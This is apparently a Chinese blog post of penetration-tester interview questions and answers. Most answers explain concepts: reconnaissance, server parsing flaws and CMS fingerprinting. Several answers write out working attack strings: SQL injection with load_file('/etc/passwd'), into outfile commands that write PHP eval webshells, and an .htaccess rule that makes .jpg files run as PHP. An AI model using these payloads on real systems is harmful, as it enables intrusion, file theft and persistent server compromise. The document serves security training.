渗透测试工程师面试题大全

本文涉及的产品
RDS MySQL Serverless 基础系列,0.5-2RCU 50GB
云数据库 RDS MySQL,集群系列 2核4GB
推荐场景:
搭建个人博客
云解析 DNS,旗舰版 1个月
简介: 渗透测试工程师面试题大全

 目录

渗透测试工程师面试题大全

知孤云出岫 整理

1.拿到一个待检测的站,你觉得应该先做什么?

2.mysql 的网站注入,5.0 以上和 5.0 以下有什么区别?

3.在渗透过程中,收集目标站注册人邮箱对我们有什么价值?

4.判断出网站的 CMS 对渗透有什么意义?

5.一个成熟并且相对安全的 CMS,渗透时扫目录的意义?

6.常见的网站服务器容器?

7.mysql 注入点,用工具对目标站直接写入一句话,需要哪些条件?

8.目前已知哪些版本的容器有解析漏洞,具体举例?

9、如何手工快速判断目标站是 windows 还是 linux 服务器?

10.为何一个 mysql 数据库的站,只有一个 80 端口开放?

11.3389 无法连接的几种情况?

12.在某后台新闻编辑界面看到编辑器,应该先做什么?

13.拿到一个 webshell 发现网站根目录下有.htaccess 文件,我们能做什么?

14.注入漏洞只能查账号密码?


image.gif 编辑


渗透测试工程师面试题大全

知孤云出岫 整理


1.拿到一个待检测的站,你觉得应该先做什么?

       收集信息:whois、网站源 IP、旁站、C 段网站、服务器系统版本、容器版本、程序版本、数据库类型、二级域名、防火墙、维护者信息另说...

2.mysql 的网站注入,5.0 以上和 5.0 以下有什么区别?

       5.0 以下没有 information_schema 这个系统表,无法列表名等,只能暴力跑表名;5.0 以下是多用户单操作,5.0 以上是多用户多操做。

3.在渗透过程中,收集目标站注册人邮箱对我们有什么价值?

 (1)丢社工库里看看有没有泄露密码,然后尝试用泄露的密码进行登录后台

 (2)用邮箱做关键词进行丢进搜索引擎

 (3)利用搜索到的关联信息找出其他邮箱进而得到常用社交账号

 (4)社工找出社交账号,里面或许会找出管理员设置密码的习惯

 (5)利用已有信息生成专用字典

(6) 观察管理员常逛哪些非大众性网站,拿下它,你会得到更多好东西

4.判断出网站的 CMS 对渗透有什么意义?

       查找网上已曝光的程序漏洞,如果开源,还能下载相对应的源码进行代码审计。

5.一个成熟并且相对安全的 CMS,渗透时扫目录的意义?

       (1)敏感文件、二级目录扫描

       (2)站长的误操作比如:网站备份的压缩文件、说明.txt、二级目录可能存放着其他站点

6.常见的网站服务器容器?

       IIS、Apache、nginx、Tomcat,weblogic、jboss

7.mysql 注入点,用工具对目标站直接写入一句话,需要哪些条件?

root 权限以及网站的绝对路径load_file()读取文件操作

前提:

知道文件的绝对路径能够使用union 查询

对 web 目录有写的权限

union select 1,load_file('/etc/passwd'),3,4,5# 0x2f6574632f706173737764

          union select 1,load_file(0x2f6574632f706173737764),3,4,5# 路径没有加单引号的话  必须转换十六进制

要是想省略单引号的话必须转换十六进制into outfile 写入文件操作

前提:

文件名必须是全路径(绝对路径) 用户必须有写文件的权限

没有对单引号'过滤

select '<?php phpinfo(); ?>' into outfile 'C:\Windows\tmp\8.php' select '<?php @eval($_POST["admin"]); ?>' into outfile

'C:\Windows\tmp\8.php'

路径里面两个反斜杠\可以换成一个正斜杠/

PHP 语句没有单引号的话,必须转换成十六进制要是想省略单引号'的话,必须转换成十六进制

<?php eval($_POST["admin"]); ?> 或 者 <?php eval($_GET["admin"]); ?>

<?php @eval($_POST["admin"]); ?>

<?php phpinfo(); ?>

<?php eval($_POST["admin"]); ?>

建议一句话 PHP 语句转换成十六进制

8.目前已知哪些版本的容器有解析漏洞,具体举例?

   (1)IIS 6.0

/xx.asp/xx.jpg "xx.asp"是文件夹名

(2) IIS 7.0/7.5

默认 Fast-CGI 开启,直接在 url 中图片地址后面输入/1.php,会把正常图片当成 php 解析

  (3)Nginx

  版本小于等于 0.8.37,利用方法和 IIS 7.0/7.5 一样,Fast-CGI 关闭情况下也可利用。

空字节代码 xxx.jpg.php

  (4)Apache

上传的文件命名为:test.php.x1.x2.x3,Apache 是从右往左判断后缀

(5)lighttpd xx.jpg/xx.php

9、如何手工快速判断目标站是 windows 还是 linux 服务器?

linux 大小写敏感,windows 大小写不敏感

10.为何一个 mysql 数据库的站,只有一个 80 端口开放?

  • 更改了端口,没有扫描出来


  • 站库分离
  • 3306 端口不对外开放

11.3389 无法连接的几种情况?

(1)没开放 3389 端口
(2)端口被修改

    (3)防护拦截
    (4)处于内网(需进行端口转发)

12.在某后台新闻编辑界面看到编辑器,应该先做什么?

       查看编辑器的名称版本,然后搜索公开的漏洞

13.拿到一个 webshell 发现网站根目录下有.htaccess 文件,我们能做什么?

能做的事情很多,用隐藏网马来举例子:

插入<FilesMatch "xxx.jpg"> SetHandler application/x-httpd-php

</FilesMatch>

.jpg 文件会被解析成.php 文件

14.注入漏洞只能查账号密码?

       可脱裤,可上传 webshell,可执行命令

image.gif

相关文章
|
15天前
|
存储 网络协议 安全
30 道初级网络工程师面试题,涵盖 OSI 模型、TCP/IP 协议栈、IP 地址、子网掩码、VLAN、STP、DHCP、DNS、防火墙、NAT、VPN 等基础知识和技术,帮助小白们充分准备面试,顺利踏入职场
本文精选了 30 道初级网络工程师面试题,涵盖 OSI 模型、TCP/IP 协议栈、IP 地址、子网掩码、VLAN、STP、DHCP、DNS、防火墙、NAT、VPN 等基础知识和技术,帮助小白们充分准备面试,顺利踏入职场。
49 2
|
2月前
|
Java 测试技术 程序员
「测试线排查的一些经验-上篇」&& 后端工程师
「测试线排查的一些经验-上篇」&& 后端工程师
16 1
|
3月前
|
运维 测试技术
拆分软件测试流程,一张图秒杀所有面试
本文主要介绍了软件测试流程的核心内容,包括需求分析、测试用例编写、测试执行、缺陷提交及回归测试等关键步骤。以迭代测试为例,详细说明了每个环节的具体操作和注意事项,并提供了一张测试流程图以便理解。测试流程确保了软件质量,是面试中常见的考察点。
65 7
拆分软件测试流程,一张图秒杀所有面试
|
4月前
|
算法
测试工程师的技能升级:LeetCode算法挑战与职业成长
这篇文章通过作者亲身体验LeetCode算法题的过程,探讨了测试工程师学习算法的重要性,并强调了算法技能对于测试职业成长的必要性。
70 1
测试工程师的技能升级:LeetCode算法挑战与职业成长
|
4月前
|
网络协议 网络架构
OSPF邻居关系建立失败?揭秘网络工程师面试中最常见的难题,这些关键步骤你掌握了吗?网络配置的陷阱就在这里!
【8月更文挑战第19天】OSPF是网络工程中确保数据高效传输的关键协议。但常遇难题:路由器间无法建立OSPF邻居关系,影响网络稳定并成为面试热点。解决此问题需检查网络连通性(如使用`ping`),确认OSPF区域配置一致(通过`show running-config`),校准Hello与Dead计时器(配置`hello`和`dead`命令),及核查IP地址和子网掩码正确无误(使用`ip address`)。系统排查上述因素可确保OSPF稳定运行。
77 2
|
4月前
|
运维 测试技术
测试与开发问题之测试开发工程师与软件开发工程师和测试工程师如何区别
测试与开发问题之测试开发工程师与软件开发工程师和测试工程师如何区别
|
4月前
|
SQL 安全 测试技术
[go 面试] 接口测试的方法与技巧
[go 面试] 接口测试的方法与技巧
|
4月前
|
运维 Kubernetes 关系型数据库
云计算运维工程师面试技巧
【8月更文挑战第6天】
409 1
|
4月前
|
自然语言处理 网络协议 JavaScript
23.2月 可能七牛云实习测试面试(技术面一面)面经整理
关于2月进行的七牛云实习测试面试(技术面一面)的面经整理,涵盖了多个技术问题,包括马尔可夫链的用处、软件测试工具、TCP/IP协议的三次握手过程、TCP与UDP的区别、网络诊断方法、DNS的作用、ifconfig命令的用途、Spring Boot的优势以及Java中Map的了解,还包括了一个编程题目:在n个书中找出k个最小的数。
|
4月前
|
监控 安全 测试技术
测试与开发问题之为什么测试开发工程师需要有安全生产意识,文档编写能力对于测试开发工程师的重要性如何理解
测试与开发问题之为什么测试开发工程师需要有安全生产意识,文档编写能力对于测试开发工程师的重要性如何理解